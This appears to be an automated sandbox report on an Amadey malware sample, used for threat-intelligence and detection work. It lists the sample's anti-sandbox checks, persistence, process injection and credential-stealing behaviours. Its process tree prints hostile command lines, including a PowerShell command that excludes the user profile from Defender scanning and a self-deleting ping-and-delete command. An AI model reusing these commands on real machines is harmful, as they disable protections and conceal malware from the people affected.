amadey | bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e

Virtualization/Sandbox Evasion

Processes:

bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exeexplorgu.exeq6fTDfvQIk0vQg4JK85pUzGa.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorgu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	q6fTDfvQIk0vQg4JK85pUzGa.exe

Blocklisted process makes network request 2 IoCs

Processes:

rundll32.exerundll32.exe

flow pid process

93 1376 rundll32.exe
94 392 rundll32.exe
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 3 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exenetsh.exe

pid process

4364 netsh.exe
5900 netsh.exe
816 netsh.exe

flow	pid	process
93	1376	rundll32.exe
94	392	rundll32.exe

pid	process
4364	netsh.exe
5900	netsh.exe
816	netsh.exe

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exeexplorgu.exeq6fTDfvQIk0vQg4JK85pUzGa.exeInstall.exeInstall.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorgu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorgu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	q6fTDfvQIk0vQg4JK85pUzGa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	q6fTDfvQIk0vQg4JK85pUzGa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

explorgu.exeT69JRNcJ5Pb8Kvyeh54nUcEz.exeu2rg.0.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	explorgu.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	T69JRNcJ5Pb8Kvyeh54nUcEz.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	u2rg.0.exe

Drops startup file 10 IoCs

Processes:

msbuild.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSuUnFhC1ICkIorcm355R2bi.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EbXV7yN12JQAbskeKEH8vIYI.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qFAlUbBZF8Hnddjo0tExhsKL.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\p8MIG2rw0ZilMg9M3aDsd4JK.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c1oYWmyAvelvfmRoSFD3lMy6.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\K4tmRJm1zEjbzpZXcktizeBp.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PIWBQAD48yiHI89Wk3gprxiQ.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xDEk0GlCtkd2x31oxGqjv5eb.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TQawjy54jNWz1k483SiiVTe6.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IcjvHSgq4VdWBnbDXekf7YjN.bat	msbuild.exe

Executes dropped EXE 22 IoCs

Processes:

explorgu.exefile300un.exeT69JRNcJ5Pb8Kvyeh54nUcEz.exeFHZBtr50rRcfTdllNwk2pZND.exeKR7axLmK85pHCtYC8Jy6HuM8.exeGMzYdBCcCSK6EIzmSzSqgTWZ.exenZXf9m6T3j0fmQmAo2ECjkpw.exeu2rg.0.exeG0jT3CGihLOYKL4sbc74s4ak.exeq6fTDfvQIk0vQg4JK85pUzGa.exeBp69MLnON446Ce82F0kC5faD.exeG0jT3CGihLOYKL4sbc74s4ak.exeLxSSn55Rw88rJ6lmDBQ8L4ps.exeu2rg.1.exeG0jT3CGihLOYKL4sbc74s4ak.exeG0jT3CGihLOYKL4sbc74s4ak.exeG0jT3CGihLOYKL4sbc74s4ak.exeInstall.exeInstall.exeInstall.exeInstall.exeBGIIDAEBGC.exe

pid	process
3884	explorgu.exe
4548	file300un.exe
3580	T69JRNcJ5Pb8Kvyeh54nUcEz.exe
4440	FHZBtr50rRcfTdllNwk2pZND.exe
4864	KR7axLmK85pHCtYC8Jy6HuM8.exe
2492	GMzYdBCcCSK6EIzmSzSqgTWZ.exe
3816	nZXf9m6T3j0fmQmAo2ECjkpw.exe
976	u2rg.0.exe
3800	G0jT3CGihLOYKL4sbc74s4ak.exe
2344	q6fTDfvQIk0vQg4JK85pUzGa.exe
2584	Bp69MLnON446Ce82F0kC5faD.exe
3076	G0jT3CGihLOYKL4sbc74s4ak.exe
4748	LxSSn55Rw88rJ6lmDBQ8L4ps.exe
1408	u2rg.1.exe
3780	G0jT3CGihLOYKL4sbc74s4ak.exe
2424	G0jT3CGihLOYKL4sbc74s4ak.exe
5016	G0jT3CGihLOYKL4sbc74s4ak.exe
4348	Install.exe
3180	Install.exe
4404	Install.exe
4380	Install.exe
5784	BGIIDAEBGC.exe

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

Processes:

bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exeexplorgu.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Software\Wine	bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exe
Key opened	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Software\Wine	explorgu.exe

Loads dropped DLL 10 IoCs

Processes:

rundll32.exerundll32.exeG0jT3CGihLOYKL4sbc74s4ak.exeu2rg.0.exeG0jT3CGihLOYKL4sbc74s4ak.exerundll32.exeG0jT3CGihLOYKL4sbc74s4ak.exeG0jT3CGihLOYKL4sbc74s4ak.exeG0jT3CGihLOYKL4sbc74s4ak.exe

pid	process
4776	rundll32.exe
1376	rundll32.exe
3800	G0jT3CGihLOYKL4sbc74s4ak.exe
976	u2rg.0.exe
976	u2rg.0.exe
3076	G0jT3CGihLOYKL4sbc74s4ak.exe
392	rundll32.exe
3780	G0jT3CGihLOYKL4sbc74s4ak.exe
2424	G0jT3CGihLOYKL4sbc74s4ak.exe
5016	G0jT3CGihLOYKL4sbc74s4ak.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 9 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\q6fTDfvQIk0vQg4JK85pUzGa.exe	themida
behavioral1/memory/2344-389-0x00007FF7E4380000-0x00007FF7E4E8A000-memory.dmp	themida
behavioral1/memory/2344-415-0x00007FF7E4380000-0x00007FF7E4E8A000-memory.dmp	themida
behavioral1/memory/2344-398-0x00007FF7E4380000-0x00007FF7E4E8A000-memory.dmp	themida
behavioral1/memory/2344-433-0x00007FF7E4380000-0x00007FF7E4E8A000-memory.dmp	themida
behavioral1/memory/2344-439-0x00007FF7E4380000-0x00007FF7E4E8A000-memory.dmp	themida
behavioral1/memory/2344-480-0x00007FF7E4380000-0x00007FF7E4E8A000-memory.dmp	themida
behavioral1/memory/2344-423-0x00007FF7E4380000-0x00007FF7E4E8A000-memory.dmp	themida
behavioral1/memory/2344-392-0x00007FF7E4380000-0x00007FF7E4E8A000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

Processes:

q6fTDfvQIk0vQg4JK85pUzGa.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	q6fTDfvQIk0vQg4JK85pUzGa.exe

Enumerates connected drives 3 TTPs 4 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

G0jT3CGihLOYKL4sbc74s4ak.exeG0jT3CGihLOYKL4sbc74s4ak.exe

description	ioc	process
File opened (read-only)	\??\F:	G0jT3CGihLOYKL4sbc74s4ak.exe
File opened (read-only)	\??\D:	G0jT3CGihLOYKL4sbc74s4ak.exe
File opened (read-only)	\??\F:	G0jT3CGihLOYKL4sbc74s4ak.exe
File opened (read-only)	\??\D:	G0jT3CGihLOYKL4sbc74s4ak.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

26 pastebin.com
28 pastebin.com
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

107 api.myip.com
108 api.myip.com
114 ipinfo.io
115 ipinfo.io

flow	ioc
26	pastebin.com
28	pastebin.com

flow	ioc
107	api.myip.com
108	api.myip.com
114	ipinfo.io
115	ipinfo.io

Drops file in System32 directory 4 IoCs

Processes:

q6fTDfvQIk0vQg4JK85pUzGa.exe

description	ioc	process
File opened for modification	C:\Windows\System32\GroupPolicy	q6fTDfvQIk0vQg4JK85pUzGa.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	q6fTDfvQIk0vQg4JK85pUzGa.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	q6fTDfvQIk0vQg4JK85pUzGa.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	q6fTDfvQIk0vQg4JK85pUzGa.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exeexplorgu.exeq6fTDfvQIk0vQg4JK85pUzGa.exe

pid process

1376 bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exe
3884 explorgu.exe
2344 q6fTDfvQIk0vQg4JK85pUzGa.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

file300un.exenZXf9m6T3j0fmQmAo2ECjkpw.exe

description	pid	process	target process
PID 4548 set thread context of 2884	4548	file300un.exe	msbuild.exe
PID 3816 set thread context of 4240	3816	nZXf9m6T3j0fmQmAo2ECjkpw.exe	RegAsm.exe

Drops file in Windows directory 1 IoCs

Processes:

bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exe

description ioc process

File created C:\Windows\Tasks\explorgu.job bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exe
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

5652 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\Tasks\explorgu.job	bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exe

pid	process
5652	sc.exe

Program crash 6 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2020	3816	WerFault.exe	nZXf9m6T3j0fmQmAo2ECjkpw.exe
2372	4240	WerFault.exe	RegAsm.exe
3128	3580	WerFault.exe	T69JRNcJ5Pb8Kvyeh54nUcEz.exe
2372	4240	WerFault.exe	RegAsm.exe
5632	976	WerFault.exe	u2rg.0.exe
708	4440	WerFault.exe	FHZBtr50rRcfTdllNwk2pZND.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

u2rg.1.exe

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u2rg.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u2rg.1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u2rg.1.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

u2rg.0.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	u2rg.0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	u2rg.0.exe

Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

5696 schtasks.exe
3944 schtasks.exe
6060 schtasks.exe
6124 schtasks.exe
3980 schtasks.exe
4440 schtasks.exe
2892 schtasks.exe

pid	process
5696	schtasks.exe
3944	schtasks.exe
6060	schtasks.exe
6124	schtasks.exe
3980	schtasks.exe
4440	schtasks.exe
2892	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

System Information Discovery

Processes:

Install.exeInstall.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1420 PING.EXE

pid	process
1420	PING.EXE

Suspicious behavior: EnumeratesProcesses 37 IoCs

Processes:

bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exeexplorgu.exepowershell.exeu2rg.0.exerundll32.exepowershell.exeRegAsm.exedialer.exepowershell.exepowershell.exepowershell.exe

pid	process
1376	bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exe
1376	bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exe
3884	explorgu.exe
3884	explorgu.exe
1100	powershell.exe
1100	powershell.exe
976	u2rg.0.exe
976	u2rg.0.exe
1376	rundll32.exe
1376	rundll32.exe
1376	rundll32.exe
1376	rundll32.exe
1376	rundll32.exe
1376	rundll32.exe
1376	rundll32.exe
1376	rundll32.exe
1376	rundll32.exe
1376	rundll32.exe
4868	powershell.exe
4868	powershell.exe
4868	powershell.exe
4240	RegAsm.exe
4240	RegAsm.exe
2568	dialer.exe
2568	dialer.exe
2568	dialer.exe
2568	dialer.exe
976	u2rg.0.exe
976	u2rg.0.exe
2528	powershell.exe
2528	powershell.exe
4648	powershell.exe
4648	powershell.exe
3472	powershell.exe
3472	powershell.exe
2528	powershell.exe
3472	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

file300un.exepowershell.exemsbuild.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4548	file300un.exe
Token: SeDebugPrivilege	1100	powershell.exe
Token: SeDebugPrivilege	2884	msbuild.exe
Token: SeDebugPrivilege	4868	powershell.exe
Token: SeDebugPrivilege	2528	powershell.exe
Token: SeDebugPrivilege	4648	powershell.exe
Token: SeDebugPrivilege	3472	powershell.exe

Suspicious use of FindShellTrayWindow 8 IoCs

Processes:

bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exeu2rg.1.exe

pid	process
1376	bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exe
1408	u2rg.1.exe
1408	u2rg.1.exe
1408	u2rg.1.exe
1408	u2rg.1.exe
1408	u2rg.1.exe
1408	u2rg.1.exe
1408	u2rg.1.exe

Suspicious use of SendNotifyMessage 7 IoCs

Processes:

u2rg.1.exe

pid process

1408 u2rg.1.exe
1408 u2rg.1.exe
1408 u2rg.1.exe
1408 u2rg.1.exe
1408 u2rg.1.exe
1408 u2rg.1.exe
1408 u2rg.1.exe

pid	process
1408	u2rg.1.exe
1408	u2rg.1.exe
1408	u2rg.1.exe
1408	u2rg.1.exe
1408	u2rg.1.exe
1408	u2rg.1.exe
1408	u2rg.1.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

explorgu.exefile300un.exemsbuild.exenZXf9m6T3j0fmQmAo2ECjkpw.exeT69JRNcJ5Pb8Kvyeh54nUcEz.exerundll32.exerundll32.exeRegAsm.exe

description	pid	process	target process
PID 3884 wrote to memory of 4548	3884	explorgu.exe	file300un.exe
PID 3884 wrote to memory of 4548	3884	explorgu.exe	file300un.exe
PID 4548 wrote to memory of 1100	4548	file300un.exe	powershell.exe
PID 4548 wrote to memory of 1100	4548	file300un.exe	powershell.exe
PID 4548 wrote to memory of 2884	4548	file300un.exe	msbuild.exe
PID 4548 wrote to memory of 2884	4548	file300un.exe	msbuild.exe
PID 4548 wrote to memory of 2884	4548	file300un.exe	msbuild.exe
PID 4548 wrote to memory of 2884	4548	file300un.exe	msbuild.exe
PID 4548 wrote to memory of 2884	4548	file300un.exe	msbuild.exe
PID 4548 wrote to memory of 2884	4548	file300un.exe	msbuild.exe
PID 4548 wrote to memory of 2884	4548	file300un.exe	msbuild.exe
PID 4548 wrote to memory of 2884	4548	file300un.exe	msbuild.exe
PID 2884 wrote to memory of 3580	2884	msbuild.exe	T69JRNcJ5Pb8Kvyeh54nUcEz.exe
PID 2884 wrote to memory of 3580	2884	msbuild.exe	T69JRNcJ5Pb8Kvyeh54nUcEz.exe
PID 2884 wrote to memory of 3580	2884	msbuild.exe	T69JRNcJ5Pb8Kvyeh54nUcEz.exe
PID 2884 wrote to memory of 4864	2884	msbuild.exe	KR7axLmK85pHCtYC8Jy6HuM8.exe
PID 2884 wrote to memory of 4864	2884	msbuild.exe	KR7axLmK85pHCtYC8Jy6HuM8.exe
PID 2884 wrote to memory of 4864	2884	msbuild.exe	KR7axLmK85pHCtYC8Jy6HuM8.exe
PID 2884 wrote to memory of 4440	2884	msbuild.exe	schtasks.exe
PID 2884 wrote to memory of 4440	2884	msbuild.exe	schtasks.exe
PID 2884 wrote to memory of 4440	2884	msbuild.exe	schtasks.exe
PID 2884 wrote to memory of 2492	2884	msbuild.exe	GMzYdBCcCSK6EIzmSzSqgTWZ.exe
PID 2884 wrote to memory of 2492	2884	msbuild.exe	GMzYdBCcCSK6EIzmSzSqgTWZ.exe
PID 2884 wrote to memory of 2492	2884	msbuild.exe	GMzYdBCcCSK6EIzmSzSqgTWZ.exe
PID 2884 wrote to memory of 3816	2884	msbuild.exe	nZXf9m6T3j0fmQmAo2ECjkpw.exe
PID 2884 wrote to memory of 3816	2884	msbuild.exe	nZXf9m6T3j0fmQmAo2ECjkpw.exe
PID 2884 wrote to memory of 3816	2884	msbuild.exe	nZXf9m6T3j0fmQmAo2ECjkpw.exe
PID 3816 wrote to memory of 4240	3816	nZXf9m6T3j0fmQmAo2ECjkpw.exe	RegAsm.exe
PID 3816 wrote to memory of 4240	3816	nZXf9m6T3j0fmQmAo2ECjkpw.exe	RegAsm.exe
PID 3816 wrote to memory of 4240	3816	nZXf9m6T3j0fmQmAo2ECjkpw.exe	RegAsm.exe
PID 3816 wrote to memory of 4240	3816	nZXf9m6T3j0fmQmAo2ECjkpw.exe	RegAsm.exe
PID 3816 wrote to memory of 4240	3816	nZXf9m6T3j0fmQmAo2ECjkpw.exe	RegAsm.exe
PID 3816 wrote to memory of 4240	3816	nZXf9m6T3j0fmQmAo2ECjkpw.exe	RegAsm.exe
PID 3816 wrote to memory of 4240	3816	nZXf9m6T3j0fmQmAo2ECjkpw.exe	RegAsm.exe
PID 3816 wrote to memory of 4240	3816	nZXf9m6T3j0fmQmAo2ECjkpw.exe	RegAsm.exe
PID 3816 wrote to memory of 4240	3816	nZXf9m6T3j0fmQmAo2ECjkpw.exe	RegAsm.exe
PID 3816 wrote to memory of 4240	3816	nZXf9m6T3j0fmQmAo2ECjkpw.exe	RegAsm.exe
PID 3816 wrote to memory of 4240	3816	nZXf9m6T3j0fmQmAo2ECjkpw.exe	RegAsm.exe
PID 3580 wrote to memory of 976	3580	T69JRNcJ5Pb8Kvyeh54nUcEz.exe	u2rg.0.exe
PID 3580 wrote to memory of 976	3580	T69JRNcJ5Pb8Kvyeh54nUcEz.exe	u2rg.0.exe
PID 3580 wrote to memory of 976	3580	T69JRNcJ5Pb8Kvyeh54nUcEz.exe	u2rg.0.exe
PID 3884 wrote to memory of 4776	3884	explorgu.exe	rundll32.exe
PID 3884 wrote to memory of 4776	3884	explorgu.exe	rundll32.exe
PID 3884 wrote to memory of 4776	3884	explorgu.exe	rundll32.exe
PID 4776 wrote to memory of 1376	4776	rundll32.exe	rundll32.exe
PID 4776 wrote to memory of 1376	4776	rundll32.exe	rundll32.exe
PID 1376 wrote to memory of 1028	1376	rundll32.exe	netsh.exe
PID 1376 wrote to memory of 1028	1376	rundll32.exe	netsh.exe
PID 1376 wrote to memory of 4868	1376	rundll32.exe	powershell.exe
PID 1376 wrote to memory of 4868	1376	rundll32.exe	powershell.exe
PID 2884 wrote to memory of 3800	2884	msbuild.exe	G0jT3CGihLOYKL4sbc74s4ak.exe
PID 2884 wrote to memory of 3800	2884	msbuild.exe	G0jT3CGihLOYKL4sbc74s4ak.exe
PID 2884 wrote to memory of 3800	2884	msbuild.exe	G0jT3CGihLOYKL4sbc74s4ak.exe
PID 4240 wrote to memory of 2568	4240	RegAsm.exe	dialer.exe
PID 4240 wrote to memory of 2568	4240	RegAsm.exe	dialer.exe
PID 4240 wrote to memory of 2568	4240	RegAsm.exe	dialer.exe
PID 4240 wrote to memory of 2568	4240	RegAsm.exe	dialer.exe
PID 2884 wrote to memory of 2344	2884	msbuild.exe	q6fTDfvQIk0vQg4JK85pUzGa.exe
PID 2884 wrote to memory of 2344	2884	msbuild.exe	q6fTDfvQIk0vQg4JK85pUzGa.exe
PID 2884 wrote to memory of 2584	2884	msbuild.exe	Bp69MLnON446Ce82F0kC5faD.exe
PID 2884 wrote to memory of 2584	2884	msbuild.exe	Bp69MLnON446Ce82F0kC5faD.exe
PID 2884 wrote to memory of 2584	2884	msbuild.exe	Bp69MLnON446Ce82F0kC5faD.exe
PID 4240 wrote to memory of 2568	4240	RegAsm.exe	dialer.exe
PID 3580 wrote to memory of 1408	3580	T69JRNcJ5Pb8Kvyeh54nUcEz.exe	u2rg.1.exe

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2540
- C:\Windows\SysWOW64\dialer.exe
  "C:\Windows\system32\dialer.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2568

C:\Users\Admin\AppData\Local\Temp\bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exe
"C:\Users\Admin\AppData\Local\Temp\bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:1376

C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3884
- C:\Users\Admin\AppData\Local\Temp\1001085001\file300un.exe
  "C:\Users\Admin\AppData\Local\Temp\1001085001\file300un.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4548
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1100
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
    3⤵
    - Drops startup file
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2884
  - - C:\Users\Admin\Pictures\T69JRNcJ5Pb8Kvyeh54nUcEz.exe
      "C:\Users\Admin\Pictures\T69JRNcJ5Pb8Kvyeh54nUcEz.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3580
    - - C:\Users\Admin\AppData\Local\Temp\u2rg.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u2rg.0.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:976
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\BGIIDAEBGC.exe"
        6⤵
        
        PID:5396
        
        C:\Users\Admin\AppData\Local\Temp\BGIIDAEBGC.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BGIIDAEBGC.exe"
        7⤵
        Executes dropped EXE
        
        PID:5784
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\BGIIDAEBGC.exe
        8⤵
        
        PID:5164
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 2.2.2.2 -n 1 -w 3000
        9⤵
        Runs ping.exe
        
        PID:1420
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 976 -s 2744
        6⤵
        Program crash
        
        PID:5632
    - - C:\Users\Admin\AppData\Local\Temp\u2rg.1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u2rg.1.exe"
        5⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:1408
      - C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        6⤵
        
        PID:5792
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3580 -s 1532
        5⤵
        Program crash
        
        PID:3128
  - - C:\Users\Admin\Pictures\KR7axLmK85pHCtYC8Jy6HuM8.exe
      "C:\Users\Admin\Pictures\KR7axLmK85pHCtYC8Jy6HuM8.exe"
      4⤵
      Executes dropped EXE
      PID:4864
